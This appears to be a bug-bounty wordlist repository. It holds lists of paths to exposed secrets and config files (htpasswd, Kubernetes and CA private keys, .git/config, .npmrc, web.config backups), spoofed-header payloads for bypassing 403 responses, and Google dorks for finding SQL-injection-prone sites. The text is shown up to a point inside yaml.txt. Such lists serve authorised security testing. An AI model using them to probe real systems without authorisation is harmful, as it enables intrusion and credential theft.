├── keys.txt ├── README.md ├── htaccess ├── ec2.txt ├── extensions.txt ├── ngnix.txt ├── .github └── FUNDING.yml ├── LICENSE ├── properties-files.txt ├── webconfig.txt ├── 403_header_payloads.txt ├── git_config.txt ├── k8s.txt ├── sqli-google-dorks.txt ├── config.txt ├── juicy-paths.txt ├── npmrc.txt ├── tomcat.txt ├── log.txt ├── cgi-bin.txt ├── yaml.txt ├── api-actions.txt ├── 403_url_payloads.txt ├── css_all_properties.txt ├── sql.txt ├── user_field_names.txt ├── phpmyadmin.txt ├── adminer.txt ├── dll_files.txt ├── cve-paths.txt ├── all-gitdorks.txt ├── leaky-misconfigs.txt ├── android_all_permissions.txt ├── wordpress-random.txt ├── shodan-dorks.txt ├── env.txt ├── sqli_blind_time-based.txt ├── antivirus_names.txt ├── api.txt └── backup_files_only.txt /keys.txt: -------------------------------------------------------------------------------- 1 | /ca-key.pem 2 | /ca.pem 3 | /apiserver.pem 4 | /apiserver-key.pem 5 | /apiserver-aggregator-ca.cert 6 | /apiserver-aggregator.cert 7 | /server.cert 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bug-Bounty-Wordlists 2 | A repository that includes all the important wordlists used while bug hunting. 3 | 4 | Wordlists will be updated regularly 5 | 6 | Also you are welcome to contribute in this project and upload your own wordlists. Highly Appreactiable. 7 | 8 | Note : This repository contains some public available wordlists and the objective is to bring all these wordlists at one place. 9 | -------------------------------------------------------------------------------- /htaccess: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess-dev 3 | /.htaccess-local 4 | /.htaccess-marco 5 | /.htaccess.BAK 6 | /.htaccess.bak 7 | /.htaccess.bak1 8 | /.htaccess.inc 9 | /.htaccess.old 10 | /.htaccess.orig 11 | /.htaccess.sample 12 | /.htaccess.save 13 | /.htaccess.txt 14 | /.htaccess/ 15 | /.htaccess_extra 16 | /.htaccess_orig 17 | /.htaccess_sc 18 | /.htaccessBAK 19 | /.htaccessOLD 20 | /.htaccessOLD2 21 | /.htaccess~ 22 | /.htgroup 23 | /.htpasswd 24 | /.htpasswd-old 25 | /.htpasswd.bak 26 | /.htpasswd.inc 27 | /.htpasswd/ 28 | /.htpasswd_test 29 | /.htpasswds 30 | /.htpasswrd 31 | /#.htaccess# 32 | /secure/.htaccess 33 | /.htaccess.swp 34 | -------------------------------------------------------------------------------- /ec2.txt: -------------------------------------------------------------------------------- 1 | /var/lib/cloud/instance/boot-finished 2 | /var/lib/cloud/instance/cloud-config.txt 3 | /var/lib/cloud/instance/datasource 4 | /var/lib/cloud/instance/handlers/ 5 | /var/lib/cloud/instance/obj.pkl 6 | /var/lib/cloud/instance/scripts/ 7 | /var/lib/cloud/instance/sem/ 8 | /var/lib/cloud/instance/user-data.txt 9 | /var/lib/cloud/instance/user-data.txt.i 10 | /var/lib/cloud/instance/vendor-data.txt 11 | /var/lib/cloud/instance/vendor-data.txt.i 12 | boot-finished 13 | cloud-config.txt 14 | datasource 15 | handlers/ 16 | obj.pkl 17 | scripts/ 18 | sem/ 19 | user-data.txt 20 | user-data.txt.i 21 | vendor-data.txt 22 | vendor-data.txt.i 23 | -------------------------------------------------------------------------------- /extensions.txt: -------------------------------------------------------------------------------- 1 | %- 2 | %. 3 | %.1 4 | %.2 5 | %.3 6 | %.bac 7 | %.backup 8 | %.bak 9 | %.cache 10 | %.conf 11 | %.cs 12 | %.csproj 13 | %.dif 14 | %.err 15 | %.gz 16 | %.inc 17 | %.ini 18 | %.java 19 | %.map 20 | %.log 21 | %.lst 22 | %.old 23 | %.orig 24 | %.part 25 | %.rej 26 | %.sass-cache 27 | %.sav 28 | %.save 29 | %.save.1 30 | %.sublime-project 31 | %.sublime-workspace 32 | %.swp 33 | %.tar 34 | %.tar.gz 35 | %.tgz 36 | %.temp 37 | %.templ 38 | %.tmp 39 | %.txt 40 | %.un~ 41 | %.vb 42 | %.vbproj 43 | %.vi 44 | %.zip 45 | ._% 46 | %0 47 | %s 48 | %1 49 | %_ 50 | %2 51 | %.dist 52 | %~ 53 | %~1 54 | %~bk 55 | .%.swm 56 | .%.swn 57 | .%.swo 58 | .%.swp 59 | -------------------------------------------------------------------------------- /ngnix.txt: -------------------------------------------------------------------------------- 1 | 50x.html 2 | conf 3 | conf/ 4 | conf/fastcgi_params 5 | conf/fastcgi.conf 6 | conf/koi-utf 7 | conf/koi-win 8 | conf/mime.types 9 | conf/nginx.conf 10 | conf/scgi_params 11 | conf/uwsgi_params 12 | conf/win-utf 13 | contrib 14 | contrib/ 15 | contrib/geo2nginx.pl 16 | contrib/README 17 | contrib/unicode2nginx 18 | contrib/unicode2nginx/koi-utf 19 | contrib/unicode2nginx/unicode-to-nginx.pl 20 | contrib/unicode2nginx/win-utf 21 | contrib/vim 22 | docs 23 | docs/ 24 | docs/CHANGES 25 | docs/CHANGES.ru 26 | docs/LICENSE 27 | docs/OpenSSL.LICENSE 28 | docs/PCRE.LICENCE 29 | docs/README 30 | docs/zlib.LICENSE 31 | html 32 | html/ 33 | html/50x.html 34 | html/index.html 35 | index.html 36 | logs 37 | logs/ 38 | nginx.exe 39 | temp 40 | temp/ 41 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | custom: ['https://www.buymeacoffee.com/karanxa', 'https://www.paypal.com/paypalme/karanxarora'] 13 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Karan Arora 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /properties-files.txt: -------------------------------------------------------------------------------- 1 | /apps.properties 2 | /test.properties 3 | /project.properties 4 | /dphp-mls.properties 5 | /default.properties 6 | /dphp-logging.properties 7 | /log4j.properties 8 | /build.rss.properties 9 | /dphp-template.properties 10 | /genfiles.properties 11 | /build.properties 12 | /dphp-adodb.properties 13 | /Application.properties 14 | /Wizard.properties 15 | /dzit.properties 16 | /version.properties 17 | /server.properties 18 | /defaults.properties 19 | /mail.properties 20 | /console.properties 21 | /config.properties 22 | /app.properties 23 | /preferences.properties 24 | /CatalogManager.properties 25 | /xwork-conversion.properties 26 | /ESAPI.properties 27 | /private.properties 28 | /web_app/WEB-INF/webapp.properties 29 | /lang.properties 30 | /override.properties 31 | /jdbc.properties 32 | /logging.properties 33 | /dynamiccontent.properties.jsf 34 | /dynamiccontent.properties.xhtml 35 | /javax.faces.resource/dynamiccontent.properties.jsf 36 | /javax.faces.resource/dynamiccontent.properties.xhtml 37 | /pom.properties 38 | /primefaces/javax.faces.resource/dynamiccontent.properties.jsf 39 | /primefaces/javax.faces.resource/dynamiccontent.properties.xhtml 40 | -------------------------------------------------------------------------------- /webconfig.txt: -------------------------------------------------------------------------------- 1 | /Web - Copy (3).config 2 | /Web - Copy (2).config 3 | /Web-.config 4 | /web.config.orig 5 | /Web C drive.config 6 | /Web_20200310.config 7 | /web.config 8 | /Web - 20190917.config 9 | /web - 3.5.config 10 | /Web - Copia.config 11 | /Web - Copy.config 12 | /Web - Sav.config 13 | /Web - копия.config 14 | /Web - 복사본.config 15 | /Web - 副本 (2).config 16 | /Web - 副本 (2)qrg.config 17 | /Web - 副本 (3).config 18 | /Web - 副本 (4).config 19 | /web - 副本.config 20 | /Web - 复制.config 21 | /Web 07102017.config 22 | /Web_back.config 23 | /Web_jan.config 24 | /Web_messages.svclog 25 | /Web_Original.config 26 | /Web_windows.config 27 | /Web_单院版.config 28 | /Web.config - 副本.bak 29 | /Web.config_1 30 | /web.config.bak 31 | /Web.config.bak.bak 32 | /Web.config.latest.bak 33 | /web.config.local 34 | /Web.config.new 35 | /web.config.old 36 | /Web.config.oo 37 | /Web.config.xml 38 | /web.config1 39 | /Web.Debug.config 40 | /Web.Release.config 41 | /Web.sitemap 42 | /Web1021.config 43 | /Web11.config 44 | /Web11.config.lnk 45 | /Web1111111.config 46 | /Web123.txt 47 | /Web22.config 48 | /machine.config 49 | /._machine.config 50 | /Copy of Web.config 51 | /Web.config.txt 52 | /._web.config 53 | /Web D drive.config 54 | -------------------------------------------------------------------------------- /403_header_payloads.txt: -------------------------------------------------------------------------------- 1 | Base-Url: 127.0.0.1 2 | Client-IP: 127.0.0.1 3 | Http-Url: 127.0.0.1 4 | Proxy-Host: 127.0.0.1 5 | Proxy-Url: 127.0.0.1 6 | Real-Ip: 127.0.0.1 7 | Redirect: 127.0.0.1 8 | Referer: 127.0.0.1 9 | Referrer: 127.0.0.1 10 | Refferer: 127.0.0.1 11 | Request-Uri: 127.0.0.1 12 | Uri: 127.0.0.1 13 | Url: 127.0.0.1 14 | X-Client-IP: 127.0.0.1 15 | X-Custom-IP-Authorization: 127.0.0.1 16 | X-Forward-For: 127.0.0.1 17 | X-Forwarded-By: 127.0.0.1 18 | X-Forwarded-For-Original: 127.0.0.1 19 | X-Forwarded-For: 127.0.0.1 20 | X-Forwarded-Host: 127.0.0.1 21 | X-Forwarded-Port: 443 22 | X-Forwarded-Port: 4443 23 | X-Forwarded-Port: 80 24 | X-Forwarded-Port: 8080 25 | X-Forwarded-Port: 8443 26 | X-Forwarded-Scheme: http 27 | X-Forwarded-Scheme: https 28 | X-Forwarded-Server: 127.0.0.1 29 | X-Forwarded: 127.0.0.1 30 | X-Forwarder-For: 127.0.0.1 31 | X-Host: 127.0.0.1 32 | X-Http-Destinationurl: 127.0.0.1 33 | X-Http-Host-Override: 127.0.0.1 34 | X-Original-Remote-Addr: 127.0.0.1 35 | X-Original-Url: 127.0.0.1 36 | X-Originating-IP: 127.0.0.1 37 | X-Proxy-Url: 127.0.0.1 38 | X-Real-Ip: 127.0.0.1 39 | X-Remote-Addr: 127.0.0.1 40 | X-Remote-IP: 127.0.0.1 41 | X-Rewrite-Url: 127.0.0.1 42 | X-True-IP: 127.0.0.1 43 | -------------------------------------------------------------------------------- /git_config.txt: -------------------------------------------------------------------------------- 1 | /__MACOSX/.git/config 2 | /.git/config 3 | /.git2/config 4 | /a/.git/config 5 | /admin/.git/config 6 | /amphtml/.git/config 7 | /aomanalyzer/.git/config 8 | /api/.git/config 9 | /app/.git/config 10 | /application/.git/config 11 | /AWSconf.git/config 12 | /backup/.git/config 13 | /beta/.git/config 14 | /blog/.git/config 15 | /blog/wp-content/themes/.git/config 16 | /build/.git/config 17 | /cms/.git/config 18 | /common/.git/config 19 | /data/.git/config 20 | /database/.git/config 21 | /demo/.git/config 22 | /dev/.git/config 23 | /developer/.git/config 24 | /dot.git/config 25 | /flock/.git/config 26 | /git/.git/config 27 | /live/.git/config 28 | /m/.git/config 29 | /new/.git/config 30 | /old-cuburn/.git/config 31 | /prod.git/config 32 | /public/.git/config 33 | /qa/.git/config 34 | /repos/.git/config 35 | /repository/.git/config 36 | /s3/.git/config 37 | /samples/.git/config 38 | /shop/.git/config 39 | /site/.git/config 40 | /staging/.git/config 41 | /static/.git/config 42 | /store/.git/config 43 | /vendor/.git/config 44 | /web/.git/config 45 | /wiki/.git/config 46 | /wp-content/.git/config 47 | /wp-content/plugins/.git/config 48 | /wp-content/themes/.git/config 49 | /wp-includes/js/.git/config 50 | -------------------------------------------------------------------------------- /k8s.txt: -------------------------------------------------------------------------------- 1 | ca-key.pem 2 | token_auth.csv 3 | ca.pem 4 | config.seen 5 | cloud-provider.yaml 6 | apiserver.pem 7 | 10-flannel.conf 8 | config.source 9 | audit.log 10 | config.hash 11 | apiserver-key.pem 12 | cni-conf.json 13 | kube-proxy.log 14 | apiserver-aggregator-ca.cert 15 | apiserver-aggregator.cert 16 | server.cert 17 | ca.key 18 | etcd-events.log 19 | kube-scheduler.log 20 | node-role.kubernetes.io 21 | kube-apiserver.log 22 | basic_auth.csv 23 | basic_auth02.csv 24 | dns.alpha.kubernetes.io 25 | apiserver-aggregator.key 26 | etcd.log 27 | known_tokens.csv 28 | kube-controller-manager.log 29 | ca.crt 30 | server.key 31 | run.sh 32 | etcd-apiserver-client.key 33 | etcd-ca.crt 34 | admission_controller_config.yaml 35 | serviceaccount.crt 36 | apiserver-client.crt 37 | ca-certificates.crt 38 | apiserver.crt 39 | kube-addons.sh 40 | gce.conf 41 | pv-recycler-template.yaml 42 | etcd-apiserver-client.crt 43 | proxy_client.crt 44 | apiserver.key 45 | etcd-apiserver-server.crt 46 | etcd-apiserver-ca.crt 47 | etcd-apiserver-server.key 48 | serviceaccount.key 49 | etcd-peer.key 50 | aggr_ca.crt 51 | migrate-if-needed.sh 52 | apiserver-client.key 53 | proxy_client.key 54 | etcd-peer.crt 55 | kube-addon-manager.log 56 | kube-apiserver-audit.log 57 | glbc.log 58 | -------------------------------------------------------------------------------- /sqli-google-dorks.txt: -------------------------------------------------------------------------------- 1 | intext:"error in your SQL syntax" 2 | intext:"mysql_num_rows()" 3 | in****:"mysql_fetch_array()" 4 | in****:"Error Occurred While Processing Request" 5 | in****:"Server Error in '/' Application" 6 | in****:"Microsoft OLE DB Provider for ODBC Drivers error" 7 | in****:"InvalidQuerystring" 8 | in****:"OLE DB Provider for ODBC" 9 | in****:"VBScript Runtime" 10 | in****:"ADODB.Field" 11 | in****:"BOF or EOF" 12 | in****:"ADODB.Command" 13 | in****:"JET Database" 14 | in****:"mysql_fetch_row()" 15 | in****:"Syntax error" 16 | in****:"include()" 17 | in****:"mysql_fetch_assoc()" 18 | in****:"mysql_fetch_object()" 19 | in****:"mysql_numrows()" 20 | in****:"GetArray()" 21 | in****:"FetchRow()" 22 | in****:"Input string was not in a correct format" 23 | inurl:/id= intext:"You have an error in your SQL syntax" 24 | inurl:”main.php?t= 25 | inurl:”games.php?id= 26 | inurl:”guide.php?id= 27 | inurl:”index.php?cat= 28 | allinurl:”review.php?sid= 29 | inurl:”index2.php?id= 30 | inurl:”main.php?id= 31 | inurl:zoom.php?id=site:.il 32 | inurl:”details.php?id= 33 | inurl:”?came= 34 | inurl:”index.php?page= 35 | inurl:”home.php?cat= 36 | inurl:”index2.php?id= 37 | -------------------------------------------------------------------------------- /config.txt: -------------------------------------------------------------------------------- 1 | /.config.php 2 | /.git/config 3 | ////../../data/config/microsrv.cfg 4 | //admin/config.php 5 | /admin/config.php 6 | /administrator/webconfig.txt.php 7 | /app.config 8 | /audit.config 9 | /Cassini.exe.config 10 | /ccnet.config 11 | /cgi-bin/config.exp 12 | /conceptual.config 13 | /config 14 | /config.inc 15 | /config.inc.php 16 | /config.php 17 | /config/000000000000.cfg 18 | /config/y000000000000.cfg 19 | /dashboard.config 20 | /default.config 21 | /Gallio.Ambience.Server.exe.config 22 | /Gallio.Echo.exe.config 23 | /NCoverExplorer.exe.config 24 | /NHibernate.Caches.SysCache.Tests.dll.config 25 | /NHibernate.config 26 | /NLog.config 27 | /nunit-agent.exe.config 28 | /nunit-gui.exe.config 29 | /nunit-x86.exe.config 30 | /nunit.exe.config 31 | /Rhino.Commons.NHibernate.dll.config 32 | /runFile.exe.config 33 | /sconfig.php 34 | /services.config 35 | /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml 36 | /SQLiteInMemory.Nhibernate.config 37 | /StateNameServer.exe.config 38 | /Sysindex.config 39 | /System.config 40 | /Web.config 41 | /webconfig.php 42 | /webconfig.txt.php 43 | /wp-config.php 44 | /wp-includes/css/wp-config.php 45 | /wp-includes/fonts/wp-config.php 46 | /wp-includes/modules/wp-config.php 47 | /xamlSyntax.config 48 | /xunit.console.exe.config 49 | -------------------------------------------------------------------------------- /juicy-paths.txt: -------------------------------------------------------------------------------- 1 | /.DS_Store 2 | /.git 3 | /.svn 4 | /.wp-config.php.swp 5 | /actuator 6 | /admin 7 | /admin/heapdump 8 | /api-docs 9 | /api/ 10 | /api/api-docs 11 | /api/batch 12 | /api/docs 13 | /api/proxy 14 | /api/swagger.json 15 | /api/swagger.yaml 16 | /api/v1/ 17 | /api/v1/swagger.json 18 | /api/v1/swagger.yaml 19 | /api/v2/swagger.json 20 | /api/v2/swagger.yaml 21 | /apis 22 | /application.wadl 23 | /backup 24 | /beans 25 | /composer.json 26 | /dasbhoard/ 27 | /debug 28 | /demo 29 | /docs/swagger.json 30 | /download 31 | /env 32 | /etc 33 | /fetch 34 | /graph 35 | /graphql-explorer 36 | /graphql/console 37 | /healthz 38 | /heapdump 39 | /jenkins/script 40 | /metrics 41 | /nginx_status 42 | /pprof 43 | /proxy 44 | /read_file 45 | /readfile 46 | /script 47 | /server-status 48 | /service?Wsdl 49 | /static/api/swagger.json 50 | /static/api/swagger.yaml 51 | /swagger-resources 52 | /swagger-ui 53 | /swagger-ui.html 54 | /swagger.json 55 | /swagger.yaml 56 | /swagger/api-docs 57 | /swagger/index.html 58 | /swagger/v1/api-docs 59 | /swagger/v1/swagger.json 60 | /swagger/v1/swagger.json/ 61 | /swagger/v1/swagger.yaml 62 | /swagger/v2/api-docs 63 | /swagger/v2/swagger.json 64 | /swagger/v2/swagger.yaml 65 | /test 66 | /v1.0/ 67 | /v1/ 68 | /v1/api-docs 69 | /v2/api-docs 70 | /WEB-INF/web.xml 71 | -------------------------------------------------------------------------------- /npmrc.txt: -------------------------------------------------------------------------------- 1 | /.npmrc 2 | /apigee/apigee-extension/.npmrc 3 | /azure/azure-extension/.npmrc 4 | /book/14-end/api/.npmrc 5 | /book/14-end/app/.npmrc 6 | /BookStoreDemo/.npmrc 7 | /client/.npmrc 8 | /common/config/rush/.npmrc 9 | /deployments/firebase/functions/.npmrc 10 | /examples/build-and-serve/.npmrc 11 | /examples/build-deps/.npmrc 12 | /examples/files/.npmrc 13 | /fed-e-task-02-01/code/grunt/.npmrc 14 | /fed-e-task-02-01/code/gulp/.npmrc 15 | /frontend/.npmrc 16 | /github/github-extension/.npmrc 17 | /googleMapsAPI/.npmrc 18 | /management-ui/.npmrc 19 | /mulesoft/mulesoft-extension/.npmrc 20 | /nixos/users/elf/files/npmrc 21 | /npmrc 22 | /packages/auto-label/.npmrc 23 | /packages/blunderbuss/.npmrc 24 | /packages/buildcop/.npmrc 25 | /packages/failurechecker/.npmrc 26 | /packages/find-yarn-workspace-root2/.npmrc 27 | /packages/gcf-utils/.npmrc 28 | /packages/generate-bot/.npmrc 29 | /packages/label-sync/.npmrc 30 | /packages/litexa-apl/.npmrc 31 | /packages/litexa-assets-wav/.npmrc 32 | /packages/litexa-deploy-aws/.npmrc 33 | /packages/litexa-gadgets/.npmrc 34 | /packages/litexa-html/.npmrc 35 | /packages/litexa-render-template/.npmrc 36 | /packages/litexa/.npmrc 37 | /packages/litexa/src/command-line/templates/separate/litexa/.npmrc 38 | /packages/merge-on-green/.npmrc 39 | /packages/publish/.npmrc 40 | /packages/react-exit-modal-typeform/.npmrc 41 | /packages/release-please/.npmrc 42 | /packages/sync-repo-settings/.npmrc 43 | /packages/trusted-contribution/.npmrc 44 | /server/.npmrc 45 | /swaggerhub/swaggerhub-extension/.npmrc 46 | /templates/.npmrc 47 | /test-electron/.npmrc 48 | /tests/.npmrc 49 | /types/tests/.npmrc 50 | /udacity-c3-restapi-feed/.npmrc 51 | /udacity-c3-restapi-user/.npmrc 52 | -------------------------------------------------------------------------------- /tomcat.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | jsp-examples 38 | -------------------------------------------------------------------------------- /log.txt: -------------------------------------------------------------------------------- 1 | /0.log 2 | /1.log 3 | /000003.log 4 | /000006.log 5 | /access.log 6 | /all.log 7 | /apacheAccess.log 8 | /apacheError.log 9 | /app.log 10 | /appDevDebugProjectContainerCompiler.log 11 | /application.log 12 | /application/logs/admin.log 13 | /application/logs/site.log 14 | /autoscan.log 15 | /bench.log 16 | /bogus.log 17 | /build.log 18 | /builderror.log 19 | /cadvisor_-port.log 20 | /cadvisor_-port.log.1 21 | /change.log 22 | /CMakeError.log 23 | /CMakeOutput.log 24 | /config.log 25 | /console.log 26 | /debug.log 27 | /Default-build.log 28 | /Default-exec.log 29 | /default.log 30 | /derby.log 31 | /dev.log 32 | /development.log 33 | /empty.log 34 | /err.log 35 | /error.log 36 | /errors.log 37 | /example.log 38 | /extrafield.log 39 | /figwheel_server.log 40 | /file.log 41 | /firebase-debug.log 42 | /fml-client-1.log 43 | /fml-client-2.log 44 | /fml-client-3.log 45 | /fml-client-latest.log 46 | /fml-junk-earlystartup.log 47 | /geckodriver.log 48 | /ghostdriver.log 49 | /gradle.log 50 | /ilmscli_heartbeat.log 51 | /ilmscli_heartbeat.log.1 52 | /ilmscli_mediacheck.log 53 | /ilmscli_mediacheck.log.1 54 | /ilmscli_ping.log 55 | /ilmscli_ping.log.1 56 | /ilmscli_sync.log 57 | /ilmscli_sync.log.1 58 | /ilmservices_.log 59 | /ilmservices_.log.1 60 | /info.log 61 | /install.log 62 | /jepsen.log 63 | /kitchen.log 64 | /laravel.log 65 | /latest.log 66 | /libpeerconnection.log 67 | /log.log 68 | /log1.log 69 | /log2.log 70 | /logfile.log 71 | /main.log 72 | /master.log 73 | /mkmf.log 74 | /nginx_access.log 75 | /nginx_access.log.1 76 | /node_1.log 77 | /non-object-res.log 78 | /npm-debug.log 79 | /origin.log 80 | /out.log 81 | /output.log 82 | /php_errors.log 83 | /proc_diskstats.log 84 | /proc_ps.log 85 | /proc_stat.log 86 | /prod.log 87 | /production.log 88 | /refman.log 89 | /report.log 90 | /run.log 91 | /sample.log 92 | /server.log 93 | /shadercompiler-64bit-1.log 94 | /simple.log 95 | /stacktrace.log 96 | /sut.log 97 | /test.log 98 | /texput.log 99 | /v8.log 100 | /webtalk.log 101 | /withreq.log 102 | /yarn-error.log 103 | /zookeeper.log 104 | -------------------------------------------------------------------------------- /cgi-bin.txt: -------------------------------------------------------------------------------- 1 | /cgi-bin/14all-1.1.cgi 2 | /cgi-bin/14all.cgi 3 | /cgi-bin/a1disp3.cgi 4 | /cgi-bin/a1stats/a1disp3.cgi 5 | /cgi-bin/a1stats/a1disp4.cgi 6 | /cgi-bin/admin.cgi 7 | /cgi-bin/adsl.cgi 8 | /cgi-bin/auktion.cgi 9 | /cgi-bin/bbs/read.cgi 10 | /cgi-bin/bhrss.py 11 | /cgi-bin/calendar/calendar.pl 12 | /cgi-bin/cgi 13 | /cgi-bin/CGIProxy.fcgi 14 | /cgi-bin/commerce.cgi 15 | /cgi-bin/cookie.cgi 16 | /cgi-bin/cvename.cgi 17 | /cgi-bin/dcforum.cgi 18 | /cgi-bin/ddns 19 | /cgi-bin/dial 20 | /cgi-bin/directorypro.cgi 21 | /cgi-bin/disorder 22 | /cgi-bin/e-cms/vis/vis.pl 23 | /cgi-bin/emsgb/easymsgb.pl 24 | /cgi-bin/emu/html/emumail.cgi 25 | /cgi-bin/emumail.cgi 26 | /cgi-bin/emumail/emumail.cgi 27 | /cgi-bin/ezshopper/search.cgi 28 | /cgi-bin/FileSeek.cgi 29 | /cgi-bin/FileSeek2.cgi 30 | /cgi-bin/firmwarecfg 31 | /cgi-bin/firmwareupgrade 32 | /cgi-bin/generate.cgi 33 | /cgi-bin/gH.cgi 34 | /cgi-bin/hsx.cgi 35 | /cgi-bin/im_trbbs.cgi 36 | /cgi-bin/ImageFolio/admin/admin.cgi 37 | /cgi-bin/img.pl 38 | /cgi-bin/Intruders.cfg 39 | /cgi-bin/jammail.pl 40 | /cgi-bin/kaiseki.cgi 41 | /cgi-bin/kerbynet 42 | /cgi-bin/loader 43 | /cgi-bin/loadpage.cgi 44 | /cgi-bin/luci 45 | /cgi-bin/magiccard.cgi 46 | /cgi-bin/mail/emumail.cgi 47 | /cgi-bin/mail/nph-mr.cgi 48 | /cgi-bin/main-cgi 49 | /cgi-bin/main.cgi 50 | /cgi-bin/mj_wwwusr 51 | /cgi-bin/mrtg.cgi 52 | /cgi-bin/netauth.cgi 53 | /cgi-bin/newsdesk.cgi 54 | /cgi-bin/nph-emumail.cgi 55 | /cgi-bin/order 56 | /cgi-bin/order.eu 57 | /cgi-bin/ozkerz 58 | /cgi-bin/pagelog.cgi 59 | /cgi-bin/pass" 60 | /cgi-bin/payload.luci 61 | /cgi-bin/pfdispaly.cgi 62 | /cgi-bin/pfdisplay.cgi 63 | /cgi-bin/pl_web.cgi/util_configlogin_act 64 | /cgi-bin/powerup/r.cgi 65 | /cgi-bin/probe.cgi 66 | /cgi-bin/quickstore.cgi 67 | /cgi-bin/r.cgi 68 | /cgi-bin/rb.cgi 69 | /cgi-bin/sbcgi/sitebuilder.cgi 70 | /cgi-bin/search/search.cgi 71 | /cgi-bin/shop.cgi 72 | /cgi-bin/shopper.cgi 73 | /cgi-bin/sojourn.cgi 74 | /cgi-bin/store.cgi 75 | /cgi-bin/store/index.cgi 76 | /cgi-bin/talkback.cgi 77 | /cgi-bin/technote/main.cgi 78 | /cgi-bin/traffic.cgi 79 | /cgi-bin/ttawebtop.cgi/ 80 | /cgi-bin/uploadfile 81 | /cgi-bin/view/Sandbox/BombSite 82 | /cgi-bin/vmail.cgi 83 | /cgi-bin/vtls/vtls.web.gateway 84 | /cgi-bin/webcm 85 | /cgi-bin/webmail/html/emumail.cgi 86 | /cgi-bin/webmain.cgi 87 | /cgi-bin/webspirs.cgi 88 | /cgi-bin/YaBB.pl 89 | /cgi-bin/zbtest.cgi 90 | /cgi-bin/zml.cgi 91 | -------------------------------------------------------------------------------- /yaml.txt: -------------------------------------------------------------------------------- 1 | /_config.yml 2 | /_data/navigation.yml 3 | /.appveyor.yml 4 | /.azure-pipelines.yml 5 | /.bluemix/pipeline.yml 6 | /.buildkite/pipeline.yml 7 | /.circleci/circle.yml 8 | /.circleci/config.yml 9 | /.codeclimate.yml 10 | /.codefresh/codefresh.yml 11 | /.codeship.yml 12 | /.coveralls.yml 13 | /.drone.yml 14 | /.gitlab-ci.yml 15 | /.keys.yml 16 | /.keys.yml.swp 17 | /.lgtm.yml 18 | /.rubocop.yml 19 | /.scrutinizer.yml 20 | /.semaphore/semaphore.yml 21 | /.travis.yml 22 | /.wp-cli/config.yml 23 | /admission_controller_config.yaml 24 | /ansible/push_ssh_keys_remote.yml 25 | /ansible/push_ssh_keys.yml 26 | /app/config/config_dev.yml 27 | /app/config/config_prod.yml 28 | /app/config/config_test.yml 29 | /app/config/config.yml 30 | /app/config/parameters.yml 31 | /app/config/routing_dev.yml 32 | /app/config/routing.yml 33 | /app/config/security.yml 34 | /app/config/services.yml 35 | /appveyor.yml 36 | 